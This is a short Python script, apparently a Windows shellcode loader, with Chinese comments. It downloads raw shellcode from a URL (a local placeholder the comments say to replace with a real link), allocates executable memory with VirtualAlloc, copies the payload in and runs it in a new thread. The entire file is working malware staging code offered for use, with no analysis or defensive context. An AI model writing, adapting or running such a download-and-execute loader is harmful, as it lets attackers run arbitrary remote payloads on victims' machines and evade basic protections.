#no_encrypt_shellcode_loader
import ctypes
import urllib.request

url = "http://127.0.0.1:8080/no_encrypt_shellcode.txt"  # 替换成真实链接

# 下载加密的 shellcode
print("[*] 下载远程 shellcode...")
response = urllib.request.urlopen(url)
no_encrypt_shellcode = response.read()


shellcode = no_encrypt_shellcode


# 执行
print("[*] 执行 shellcode...")

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
page = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(page), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(page), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)